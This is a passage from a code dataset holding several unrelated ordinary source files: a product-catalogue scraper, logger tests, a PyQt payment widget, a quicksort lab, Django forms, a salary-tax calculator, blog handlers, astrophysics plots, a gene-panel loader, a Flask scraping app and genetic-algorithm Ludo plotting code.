supplier_data[0].split(\"~\")\nurl_supplier = split_data[2]\n\n# Getting response from the supplier URL\nresponse_supplier = requests.get(url_supplier)\n\n# Parsing the response to HTML using beautiful soup\nsoup_supplier = BeautifulSoup(response_supplier.text, \"html.parser\")\n\n# Finding all the supplier division\nsupplier_id_div = soup.find(\"div\", {\"class\": \"m_filterbutton4\"})\n\n# Finding all the supplier id\nsupplier_id = supplier_id_div.select('option')\n\n# Initializing blank arrays\nsupplier_brand_id = []\n\n# Initializing Brand Table\nsupplier_brand_id_table = PrettyTable(['SN', 'Brand', 'Brand ID'])\n\n# Index counter\nindex = 1\n\nfor sup_id in supplier_id:\n if str(sup_id.get('value')) != \"\":\n supplier_brand_id_table.add_row([str(index), str(sup_id.text), str(sup_id.get('value'))])\n index = index + 1\n data = str(sup_id.text) + \"~\" + str(sup_id.get('value'))\n supplier_brand_id.append(data)\n if index > 18:\n break\n\nprint(supplier_brand_id_table)\n\n# Initializing blank arrays\nmodel_category_id = []\n\n# Initializing model Category Table\nmodel_category_table = PrettyTable(['SN', 'Model Category', 'Category ID'])\n\n# Brand model Category URL\nurl_model_category = \"https://www.tintenalarm.de/ajax_search_mobile.php\"\n\n# Index counter\nindex = 1\n\n# Brand ID & Request Number with GET request\nfor brd_id in supplier_brand_id:\n # Splitting brand info\n split_data = brd_id.split(\"~\")\n brand_name = split_data[0]\n brand_id = split_data[1]\n request_id = \"1\"\n PARAMS = {'root': brand_id, 'number': request_id}\n model_category_response = requests.get(url=url_model_category, params=PARAMS)\n\n # Parsing the response to HTML using beautiful soup\n soup_model_category = BeautifulSoup(model_category_response.text, \"html.parser\")\n\n # Finding all the model category\n model_id_div = soup_model_category.find(\"div\", {\"class\": \"m_filterbutton4\"})\n\n # Finding all the supplier id\n model_category = model_id_div.select('option')\n\n # model Index counter\n model_index = 1\n\n for model_cat in model_category:\n if str(model_cat.get('value')) != \"\":\n model_category_table.add_row([str(model_index), str(model_cat.text), str(model_cat.get('value'))])\n model_index = model_index + 1\n data = str(model_cat.get('value'))\n model_category_id.append(data)\n\n # Initializing Brand Identifier Table\n model_brand_identity_table = PrettyTable(['SN', 'Brand', 'Brand ID', 'Total Models'])\n model_brand_identity_table.add_row([str(index), brand_name, brand_id, str(len(model_category_id))])\n\n print(model_brand_identity_table)\n print(model_category_table)\n\n break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"476508688","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\n\nfrom ..telemetry import Logger\n\nsns.set()\n\n\ndef test_logger(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.add_entry('foo', 'bar')\n\n entries = [\n ('a', 1),\n ('b', 2),\n ('c', 5)\n ]\n\n logger.add_entries(entries)\n\n expected_logs = {\n 'foo': 'bar',\n 'a': 1,\n 'b': 2,\n 'c': 5\n }\n\n assert expected_logs == logger.get_logs()\n\n\ndef test_pre_clear(logs_dir: Path):\n with Logger(logs_dir, clear_dir=True):\n\n # has new dir been created\n assert logs_dir.is_dir()\n\n # is this new dir completely empty\n assert not tuple(logs_dir.iterdir())\n\n\ndef test_child(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.add_entry('foo', 'bar')\n with logger.get_child('child') as child_logger:\n child_logger.add_entry('foo-child', 'bar-child')\n\n child_dir = logs_dir.joinpath('child')\n\n # has new dir for child logger been created\n assert child_dir.exists()\n assert 'child' in logger.get_logs()\n\n\ndef test_log_func(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.log_func(__add, kwargs={'x': 1, 'y': 2})\n\n assert '__add' in logger.get_logs()\n\n\ndef __add(x, y):\n return x + y\n\n\ndef test_save_obj(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.save_obj(logger, 'logger')\n\n logger_path = logs_dir.joinpath('logger.joblib')\n assert logger_path.exists()\n\n logger.save_obj(logger, 'logger', prefix_step=True)\n\n logger_path = logs_dir.joinpath('01-logger.joblib')\n assert logger_path.exists()\n\n\ndef test_save_fig(logs_dir: Path, people: pd.DataFrame):\n with Logger(logs_dir) as logger:\n plt.figure(clear=True)\n\n figure = sns.barplot(\n x='name',\n y='height',\n data=people\n ).get_figure()\n\n plt.title('Height')\n\n logger.save_fig(figure, 'height', dpi=200)\n plt.close('all')\n\n plot_path = logs_dir.joinpath('height.png')\n assert plot_path.exists()\n\n\ndef test_save_csv(logs_dir: Path, people: pd.DataFrame):\n with Logger(logs_dir) as logger:\n logger.save_csv(people, 'people')\n\n people_path = logs_dir.joinpath('people.csv')\n assert people_path.exists()\n\n\ndef test_save_json(logs_dir: Path):\n with Logger(logs_dir) as logger:\n\n dictionary = {\n 'foo': 'bar'\n }\n\n logger.save_json(dictionary, 'dictionary')\n\n path = logs_dir.joinpath('dictionary.json')\n assert path.exists()\n\n\ndef test_save_image(logs_dir: Path, astronaut: np.ndarray):\n with Logger(logs_dir) as logger:\n logger.save_image(astronaut, 'astronaut')\n\n astronaut_path = logs_dir.joinpath('astronaut.png')\n assert astronaut_path.exists()\n\n logger.save_image(astronaut, 'astronaut', prefix_step=True)\n\n astronaut_path = logs_dir.joinpath('01-astronaut.png')\n assert astronaut_path.exists()\n\n\ndef test_save_gif(logs_dir: Path, astronaut: np.ndarray):\n with Logger(logs_dir) as logger:\n images = []\n images.append(astronaut)\n\n for i in range(19):\n darker = images[i] * 0.9\n darker = darker.astype(np.uint8)\n images.append(darker)\n\n logger.save_gif(images, 'astronaut')\n\n astronaut_path = logs_dir.joinpath('astronaut.gif')\n assert astronaut_path.exists()\n\n logger.save_gif(images, 'astronaut', prefix_step=True)\n\n astronaut_path = logs_dir.joinpath('01-astronaut.gif')\n assert astronaut_path.exists()\n","sub_path":"austen/test/test_telemetry.py","file_name":"test_telemetry.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"225664967","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget\nclass pay_2(QWidget):\n def __init__(self,parent=None):\n super().__init__(parent)#相当于下面那句\n self.setupUI()\n def setupUI(self):\n self.setGeometry(QtCore.QRect(259, 29, 981, 671))\n self.setObjectName(\"pay_widget\")\n self.page_title_label = QtWidgets.QLabel(self)\n self.page_title_label.setGeometry(QtCore.QRect(390, 110, 241, 61))\n font = QtGui.QFont()\n font.setFamily(\"思源宋体 CN\")\n font.setPointSize(24)\n font.setBold(True)\n font.setUnderline(True)\n font.setWeight(75)\n self.page_title_label.setFont(font)\n self.page_title_label.setObjectName(\"page_title_label\")\n self.pushButton = QtWidgets.QPushButton(self)\n self.pushButton.setGeometry(QtCore.QRect(440, 520, 90, 30))\n self.pushButton.setObjectName(\"pushButton\")\n\n self.erweima_label = QtWidgets.QLabel(self)\n self.erweima_label.setGeometry(QtCore.QRect(360, 200, 300, 300))\n\n self.erweima_label.setText(\"\")\n self.erweima_label.setPixmap(QtGui.QPixmap(\"source/erweima.jpeg\").scaled((self.erweima_label.rect().size())))\n self.erweima_label.setObjectName(\"erweima_label\")\n self.erweima_label.resize(300, 300)\n self.retranslateUi()\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n\n\n self.page_title_label.setText(_translate(\"Form\", \"支付页面2\"))\n self.pushButton.setText(_translate(\"Form\", \"支付\"))\n\n","sub_path":"源程序/14电子健康/hospital2/pay2.py","file_name":"pay2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"9462913","text":"import random\nimport math\nimport timeit\n\ndef my_quicksort(L):\n copy = quicksort_copy(L)\n for i in range(len(L)):\n L[i] = copy[i]\n\n\ndef quicksort_copy(L):\n if len(L) < 2:\n return L\n pivot = L[0]\n left, right = [], []\n for num in L[1:]:\n if num < pivot:\n left.append(num)\n else:\n right.append(num)\n return quicksort_copy(left) + [pivot] + quicksort_copy(right)\n\n\ndef create_random_list(n):\n L = []\n for _ in range(n):\n L.append(random.randint(1,n))\n return L\n\n\ndef create_near_sorted_list(n, factor):\n L = create_random_list(n)\n L.sort()\n for _ in range(math.ceil(n*factor)):\n index1 = random.randint(0, n-1)\n index2 = random.randint(0, n-1)\n L[index1], L[index2] = L[index2], L[index1]\n return L","sub_path":"Lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"187361056","text":"from django import forms\nfrom profiles.models import CompanyProfile\nfrom .models import Team, AgentRole, Shift\n\n\nclass CompanyProfileForm(forms.ModelForm):\n class Meta:\n model = CompanyProfile\n exclude = ('company_id', 'plan', 'signup_date', 'renewal_date', 'payment')\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'company_name': 'Company name',\n 'street_address1': 'Street Address 1',\n 'street_address2': 'Street Address 2',\n 'country': 'Country or State',\n 'postcode': 'Postcode',\n 'town_or_city': 'Town or City',\n 'payment': 'Paid for number of months',\n 'setting_daystart': 'Hour when your day starts',\n 'setting_dayend': 'hour when your day ends'\n }\n\n for field in self.fields:\n if field != 'country':\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n if field == 'setting_daystart' or field == 'setting_dayend' or field == 'payment':\n self.fields[field].widget.attrs['class'] = 'width-numbers'\n else:\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = placeholder\n\n\nclass TeamsForm(forms.ModelForm):\n class Meta:\n model = Team\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'team_name': 'Team name',\n 'planning_deadline': 'planning_deadline',\n 'coaching_rep': 'coaching_rep',\n 'min_lunchbreak': 'min_lunchbreak',\n 'min_dinnerbreak': 'min_dinnerbreak',\n 'min_paidbreak': 'min_paidbreak'\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n\n\nclass AgentRoleForm(forms.ModelForm):\n class Meta:\n model = AgentRole\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'role_name': 'Role name',\n 'role_color': 'role color',\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n\n\nclass ShiftForm(forms.ModelForm):\n class Meta:\n model = Shift\n exclude = ('company_id',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Add placeholders and classes\n \"\"\"\n super().__init__(*args, **kwargs)\n placeholders = {\n 'shift_name': 'Shift name',\n 'min_agents': 'Minimum Number of Agents',\n 'shift_start': 'Start time',\n 'shift_end': 'End time',\n 'weekday_sunday': 'Sunday',\n 'weekday_monday': 'Monday',\n 'weekday_tuesday': 'Tuesday',\n 'weekday_wednesday': 'Wednesday',\n 'weekday_thursday': 'Thursday',\n 'weekday_friday': 'Friday',\n 'weekday_saturday': 'Saturday'\n }\n\n for field in self.fields:\n if self.fields[field].required:\n placeholder = f'{placeholders[field]} *'\n else:\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n self.fields[field].widget.attrs['class'] = 'profile-form-input'\n self.fields[field].label = False\n","sub_path":"settings/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538185606","text":"#! /usr/bin/python\nimport sys\nimport argparse\n\nSOCIAL_BASE_LOW=3387\nSOCIAL_BASE_HIGH=25401\nPAY_BASE=3500\nL1=1500\nL2=4500\nL3=9000\nL4=35000\nL5=55000\nL6=80000\nP1=0.03\nP2=0.1\nP3=0.2\nP4=0.25\nP5=0.3\nP6=0.35\nP7=0.45\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--salary', default=10000, type=int, help='salary before tax')\n\ndef get_salary(salary):\n if salary >= SOCIAL_BASE_HIGH:\n SOCIAL_BASE=SOCIAL_BASE_HIGH\n elif salary <= SOCIAL_BASE_LOW:\n SOCIAL_BASE=SOCIAL_BASE_LOW\n else:\n SOCIAL_BASE=salary\n\n BASIC_OUT=SOCIAL_BASE*0.12+SOCIAL_BASE*0.08+SOCIAL_BASE*0.02+3+SOCIAL_BASE*0.002\n PS=salary-BASIC_OUT-PAY_BASE\n\n if PS <= 0:\n PAY=0\n elif PS <= L1:\n PAY=PS*P1\n elif PS <= L2:\n PAY=(PS-L1)*P2+L1*P1\n elif PS <= L3:\n PAY=(PS-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L4:\n PAY=(PS-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L5:\n PAY=(PS-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n elif PS <= L6:\n PAY=(PS-L5)*P6+(L5-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n else:\n PAY=(PS-L6)*P7+(L6-L5)*P6+(L5-L4)*P5+(L4-L3)*P4+(L3-L2)*P3+(L2-L1)*P2+L1*P1\n return salary-BASIC_OUT-PAY\n\nif __name__ == '__main__':\n args = parser.parse_args(sys.argv[1:])\n print(\"salary in hand:{}\".format(get_salary(args.salary)))\n\n","sub_path":"old_salary.py","file_name":"old_salary.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"10231263","text":"#coding:utf8\r\nfrom tornado.template import Loader\r\nfrom model import *\r\nfrom utils import BaseHandler\r\nimport markdown\r\nfrom decorators import require_inited\r\n\r\n\r\nclass BaseDiaryHandler(BaseHandler):\r\n def get_condition(self):\r\n if not self.current_user or self.current_user.permission < 50:\r\n condition = {\r\n 'posted = ': True\r\n }\r\n else:\r\n condition = {}\r\n return condition\r\n\r\n def render(self, template, *args, **kw):\r\n loader = Loader('templates/' + SiteProperty.get_site_properties()['template'] + '/')\r\n categories = Category.get_items()[0]\r\n tags = Tag.get_items()[0]\r\n latest_comments = Comment.get_items(\r\n limit = 5,\r\n conditions = self.get_condition()\r\n )[0]\r\n latest_guestmessages = GuestMessage.get_items(limit = 5)[0]\r\n self.render_content.update({\r\n 'categories': categories,\r\n 'tags': tags,\r\n 'latest_comments': latest_comments,\r\n 'latest_guestmessages': latest_guestmessages,\r\n })\r\n BaseHandler.render(self, loader, template, *args, **kw)\r\n\r\nclass ListDiary(BaseDiaryHandler):\r\n @require_inited\r\n def get(self):\r\n site = SiteProperty.get_site_properties()\r\n from_cursor = self.get_argument('from', None)\r\n to_cursor = self.get_argument('to', None)\r\n diaries, prev_cursor, next_cursor = self.get_paged(\r\n Diary,\r\n '-create_time',\r\n from_cursor,\r\n to_cursor,\r\n 10,\r\n self.get_condition()\r\n )\r\n render_content = {\r\n 'diaries': diaries,\r\n 'prev_cursor': prev_cursor,\r\n 'next_cursor': next_cursor,\r\n }\r\n self.render('diary.html', **render_content)\r\n\r\nclass ListDiaryByCategory(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, value):\r\n if value:\r\n category = Category.get_item('name', value)\r\n if not category:\r\n return self.redirect('/diary/')\r\n else:\r\n diaries = Diary.get_items_with_condition('ID', category.diary_list)\r\n open_diaries = [ diary for diary in diaries if diary.posted or (self.current_user and self.current_user.permission >= 50) ]\r\n render_content = {\r\n 'diaries': open_diaries,\r\n 'prev_cursor': None,\r\n 'next_cursor': None,\r\n }\r\n self.render('diary.html', **render_content)\r\n else:\r\n return self.redirect('/diary/')\r\n\r\nclass ListDiaryByTag(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, value):\r\n if value:\r\n tag = Tag.get_item('name', value)\r\n if not tag:\r\n return self.redirect('/diary/')\r\n else:\r\n diaries = Diary.get_items_with_condition('ID', tag.diary_list)\r\n open_diaries = [ diary for diary in diaries if diary.posted or (self.current_user and self.current_user.permission >= 50) ]\r\n render_content = {\r\n 'diaries': open_diaries,\r\n 'prev_cursor': None,\r\n 'next_cursor': None,\r\n }\r\n self.render('diary.html', **render_content)\r\n\r\nclass ShowDiaryDetail(BaseDiaryHandler):\r\n @require_inited\r\n def get(self, year, month, day, url):\r\n diary = Diary.get_diary(int(year), int(month), int(day), url)\r\n user = self.current_user\r\n comments = None\r\n if diary:\r\n if (not user or user.permission < 50) and not diary.posted:\r\n return self.redirect('/diary')\r\n diary.read_diary()\r\n comments = Comment.get_items_with_condition('ID', diary.comment_list, 1000)\r\n render_content = {\r\n 'diary': diary,\r\n 'comments': comments,\r\n }\r\n self.render('diarydetail.html', **render_content)\r\n\r\n @require_inited\r\n def post(self, year, month, day, url):\r\n diary = Diary.get_diary(int(year), int(month), int(day), url)\r\n if not diary:\r\n return self.redirect('/')\r\n else:\r\n user = self.current_user\r\n if not user:\r\n self.send_error(403)\r\n content = self.get_argument('content', '')\r\n if content.strip() == '':\r\n return self.write(u'评论内容不能为空')\r\n if Comment.create_comment(user, content, markdown.markdown(content, safe_mode='remove'), True, diary):\r\n self.flush_cache()\r\n self.redirect('')\r\n","sub_path":"diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"536230913","text":"from numpy import arange,genfromtxt\r\nfrom pylab import show, plot, rc, savefig, xlabel, ylabel, xlim, ylim, yscale,legend,xscale,figure,gca\r\n\r\n# import data from other code\r\nluminosity,temperature,mass,radius = genfromtxt('Stars.txt',skip_header=1,usecols=(0,1,2,3),delimiter=',',unpack=True)\r\n\r\n# Solar luminosity, mass and radius\r\nL_sun = 3.846e26\r\nM_sun = 1.989e30\r\nR_sun = 6.955e8\r\n\r\n# Use LaTeX\r\nrc('text',usetex=True)\r\n\r\n# Plot H-R Diagram\r\nfigure(1)\r\nplot(temperature,luminosity/L_sun,'k-')\r\nyscale('log')\r\nxscale('log')\r\nxlim([1500,40000])\r\nylim([9e-4,1.0e5])\r\nxlabel(r\"T$_{\\ast}$ (K)\")\r\nylabel(r\"L/L$_{\\bigodot}$\")\r\nax2 = gca()\r\nax2.invert_xaxis()\r\nsavefig('Main_sequence.png')\r\nshow(1)\r\n\r\n# Create arrays of masses to model experimental relations for main sequence\r\n# Mass-Radius relations\r\nmass2 = arange(0.1*M_sun,1.66*M_sun,0.01*M_sun)\r\nmass3 = arange(1.66*M_sun,20.0*M_sun,0.01*M_sun)\r\n\r\n# Plot Mass-Radius Relation\r\nfigure(2)\r\nplot(mass/M_sun,radius/R_sun,'ko')\r\nplot(mass2/M_sun,1.06*(mass2/M_sun)**(0.945),'r--',label=r\"R/R$_{\\bigodot}$ = 1.06(M/M$_{\\bigodot}$)$^{0.945}$\")\r\nplot(mass3/M_sun,1.33*(mass3/M_sun)**(0.555),'b--',label=r\"R/R$_{\\bigodot}$ = 1.33(M/M$_{\\bigodot}$)$^{0.555}$\")\r\nxscale('log')\r\nyscale('log')\r\nxlabel(r\"M/M$_{\\bigodot}$\")\r\nylabel(r\"R/R$_{\\bigodot}$\")\r\nlegend(loc='lower right')\r\nsavefig('Mass_radius.png')\r\nshow(2)\r\n\r\n# Create arrays of masses to model experimental relations for main sequence\r\n# Mass-Luminosity relations\r\nmass4 = arange(0.1*M_sun,0.7*M_sun,0.01*M_sun)\r\nmass5 = arange(0.7*M_sun,20.0*M_sun,0.01*M_sun)\r\n\r\n# Plot Mass-Luminosity Relation\r\nfigure(3)\r\nplot(mass/M_sun,luminosity/L_sun,'ko')\r\nplot(mass4/M_sun,0.35*(mass4/M_sun)**(2.62),'r--',label=r\"L/L$_{\\bigodot}$ = 0.35(M/M$_{\\bigodot}$)$^{2.62}$\")\r\nplot(mass5/M_sun,1.02*(mass5/M_sun)**(3.92),'b--',label=r\"L/L$_{\\bigodot}$ = 1.02(M/M$_{\\bigodot}$)$^{3.92}$\")\r\nxscale('log')\r\nyscale('log')\r\nxlabel(r\"M/M$_{\\bigodot}$\")\r\nylabel(r\"L/L$_{\\bigodot}$\")\r\nlegend(loc='lower right')\r\nsavefig('Mass_Luminosity.png')\r\nshow(3)","sub_path":"Stars-Final-Project-Python/Main_sequence.py","file_name":"Main_sequence.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"284760022","text":"import os\nfrom sickkidsproj import app\n\n# testing purpose\nONE_EXPRDATA = os.path.join(app.config[\"EXPRIMENT_DATA_DIR\"],\"10-1-M\")\n\n# panels\nGENE_PANELS = []\nGENE_PANEL_PATHS = []\nwith open(app.config[\"GENE_PANEL_LIST\"], \"r\") as f:\n for panel in f.read().strip().split('\\n'):\n GENE_PANELS.append(panel)\n GENE_PANEL_PATHS.append(os.path.join(app.config[\"GENE_PANEL_DIR\"], panel))\n\nTISSUE_SITES = []\nwith open(app.config[\"TISSUE_SITE_LIST\"], \"r\") as f:\n for tissueSite in f.read().strip().split('\\n'):\n TISSUE_SITES.append(tissueSite)\n\n# testing purposes\nONE_EXONEXPR = os.path.join(app.config[\"EXON_EXPR_DIR\"], \"47/ENSG00000182533\")\n\ndef get_panel_gene(panel):\n \"\"\" Gets list of gene associated with a gene panel\n @param str gene_panel\n @rType dict: \n [ ..., {\n \"ensembl_id\": \"ENSG00000138435\",\n \"symbol\": \"CHRNA1\"\n },\n ] \n \"\"\"\n genes = []\n with open(os.path.join(app.config[\"GENE_PANEL_DIR\"], panel), 'r') as f:\n for line in f:\n pair = line.split('\\t')\n genes.append({\n \"symbol\": pair[0].strip(),\n \"ensembl_id\": pair[1].strip()\n })\n return genes\n\nPANEL_REF = {}\nfor panel in GENE_PANELS:\n PANEL_REF[panel] = get_panel_gene(panel)\n\n\n\"\"\" A reference dictionary that maps ensembl_id to gene_symbol\n @rType: {\n ensembl_id: gene_symbol\n } \n\"\"\"\nGENE_SYMBOL_REF = {}\nwith open(app.config[\"GENE_SYMBOL_MAPPING\"], 'r') as f:\n for l in f.read().strip().split('\\n'):\n ll = l.strip().split('\\t')\n\n ensembl_id = ll[0]\n symbol = \"\"\n if len(ll) == 2:\n symbol = ll[1]\n\n GENE_SYMBOL_REF[ensembl_id] = symbol\n\n\n\n\"\"\" EXPRDATA_FILEPATHS [...exprdata_fp]\n A list of file path for experimental data in terms of exon reads\n\"\"\"\ndef get_all_exprdata_filepaths():\n fps = []\n for f in os.listdir(app.config[\"EXPRIMENT_DATA_DIR\"]):\n if not f.startswith('.') and not f.endswith('coverage') and not f.endswith('.sh'):\n fps.append(os.path.join(app.config[\"EXPRIMENT_DATA_DIR\"], f))\n return fps\nEXPRDATA_FILEPATHS = get_all_exprdata_filepaths()\n\n\n\"\"\"Available options for ranking\"\"\"\nOPTION_RANKING_ALL_GENE = \"all_gene\"\nOPTION_RANKING_ALL_GENEPANEL = \"all_gene_panel\"\nOPTION_RANKING_GENE = \"gene\"\nRANKING_OPTIONS = [OPTION_RANKING_GENE, OPTION_RANKING_ALL_GENE, OPTION_RANKING_ALL_GENEPANEL]\n\n \n\"\"\" Available options for inspection \"\"\"\nOPTION_EXONEXPR = \"exon_expr\"\nOPTION_GENEEXPR = \"gene_expr\"\nOPTION_GENEPANELS = \"gene_panels\"\nRESOURCES_OPTIONS = [OPTION_EXONEXPR, OPTION_GENEEXPR, OPTION_GENEPANELS]\n\n\n\"\"\" Possible extensions for files under resources/\"\"\"\nEXT_TEN = \"10\"\nEXT_TWENTY = \"20\"\nEXT_INC = \"modified\"\nEXTS = [EXT_TEN, EXT_TWENTY, EXT_INC]\n\n# dev specific globals\nif app.config[\"DEBUG\"]:\n\n GENCODEID_STRAND_REF = {} # gencodeid -> strand +/-\n ENSEMBLID_EXONCOUNT_REF = {} # ensembl_id -> exon_count\n\n with open(app.config[\"GENCODE_EXON_POS_ID_MAPPING\"], 'r') as f:\n f.readline()\n\n for line in f:\n row = line.strip().split('\\t')\n assert(len(row) == 5)\n\n gencodeid = row[0]\n ensembl_id = gencodeid.split('.')[0]\n strand = row[-1]\n\n # assumes entries in f unique, \n if ensembl_id not in ENSEMBLID_EXONCOUNT_REF: \n ENSEMBLID_EXONCOUNT_REF[ensembl_id] = 1\n else:\n ENSEMBLID_EXONCOUNT_REF[ensembl_id] += 1\n\n GENCODEID_STRAND_REF[gencodeid] = strand\n\n\n\n\n\n\n","sub_path":"sickkidsproj/cache/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"4293196","text":"# import libraries\nfrom flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\nimport pymongo\n\nconn = \"mongodb://localhost:27017\"\nclient = pymongo.MongoClient(conn)\n\ndb = client.mars_db\n# create instance of Flask app\napp = Flask(__name__)\n# mongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_info\")\n\n# create route that renders index.html template\n@app.route(\"/\")\ndef home():\n mars_data = db.mars_info.find_one()\n print(mars_data)\n return render_template(\"index.html\", mars_all= mars_data)\n\n@app.route(\"/scrape\")\ndef scrape():\n # Run the scrape function\n mars_dict = scrape_mars.scrape_info()\n # Update the Mongo database using update and upsert=True\n # mongo.db.mars_site.update({}, mars_dict, upsert=True)\n # Redirect back to home page\n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Missions_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460594722","text":"from pyludo import LudoGame, StandardLudoPlayers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os import path\nfrom LudoPlayerGenetic import LudoPlayerGenetic\nfrom Population import Population\n\n\ndef load_pop_size(gen=1, file='', script_dir=''):\n return len(np.load(script_dir + file + str(gen) + '.npy'))\n\n\ndef load_pop(population, gen=1, file='', script_dir=''):\n population.file = file\n population.script_dir = script_dir\n population.load_pop(gen)\n\n\ndef load_only_fitness(gen=1, file='fitness_', folder=''):\n script_dir = path.dirname(__file__) + '/' + folder + '/'\n return np.load(script_dir + file + str(gen) + '.npy')\n\n\ndef assign_fitness(amount_of_games, population):\n # print('Assigning fitness to the population')\n agent_idx = population.get_fitless_agent_idx()\n while agent_idx != -1:\n GA_agent = population.pop[agent_idx]\n # print('Calculating fitness for agent: ', agent_idx)\n # print(GA_agent)\n players = [LudoPlayerGenetic(GA_agent)] + [StandardLudoPlayers.LudoPlayerRandom() for _ in range(3)]\n for id, player in enumerate(players):\n player.id = id\n\n n = amount_of_games\n fitness = np.zeros(4, dtype=np.int)\n # print(agent_idx)\n for i in range(n):\n\n np.random.shuffle(players)\n ludoGame = LudoGame(players)\n winner = ludoGame.play_full_game()\n fitness[players[winner].id] += 1\n population.fitness_add(fitness_score=fitness[0] / amount_of_games, index_of_chromosomes=agent_idx)\n agent_idx = population.get_fitless_agent_idx()\n\n\ndef plot_pop200(to_gen=100, file='pop200_', folder='pop_pool', title='Random, sigma/4 '):\n\n script_dir = path.dirname(__file__) + '/' + folder + '/'\n fitness = []\n fitaxis = []\n fitmax = []\n pop_size = load_pop_size(gen=1, file=file, script_dir=script_dir)\n population = Population(pop_size)\n gens = range(1, to_gen + 1)\n for i in gens:\n load_pop(population, gen=i, file=file, script_dir=script_dir)\n assign_fitness(100, population=population)\n fitness = np.append(fitness, population.fitness)\n fitaxis = np.append(fitaxis, (np.zeros(pop_size, dtype=np.int) + i))\n fitmax = np.append(fitmax, population.fitness[np.argmax(population.fitness)])\n plt.figure()\n plt.plot(fitaxis, fitness, 'o', gens, np.sum(np.split(fitness / pop_size, len(gens)), axis=1))\n plt.ylabel('win rate')\n plt.xlabel('Generation')\n plt.legend(['Win-rate', 'Mean win-rate'], loc='center right')\n plt.suptitle(title)\n\n\nplot_gen = 500\n\n#plot_pop200(to_gen=plot_gen, file='pop200_', folder='pop_poolt', title='t ')\n\n#plot_pop200(to_gen=plot_gen, file='pop_pool_self_', folder='pop_pool_self', title='Self ')\n#plot_pop200(to_gen=plot_gen, file='pop200_more_lossy_muta_sigma_', folder='pop_pool_more_lossy_10_muta_40_sigma_4', title='Random, pop_pool_more_lossy_10_muta_40_sigma_4 ')\n#plot_pop200(to_gen=plot_gen, file='pop200_lossy_muta_sigma_', folder='pop_pool_lossy_7_muta_15_sigma_2', title='Random, pop_pool_lossy_7_muta_15_sigma_2 ')\n#plot_pop200(to_gen=plot_gen, file='pop200_sigma2_', folder='pop_pool_sigma_2', title='Random, half sigma ')\n#plot_pop200(to_gen=plot_gen, file='pop200_lossy_', folder='pop_pool_more_loss', title='Random, High selection ')\n\nplt.figure()\nplt.plot(load_only_fitness(gen=500, file='fitness_', folder='pop_pool'), 'o', load_only_fitness(gen=500, file='fitness_t_', folder='pop_pool_self'), 'ro')\nplt.ylabel('win 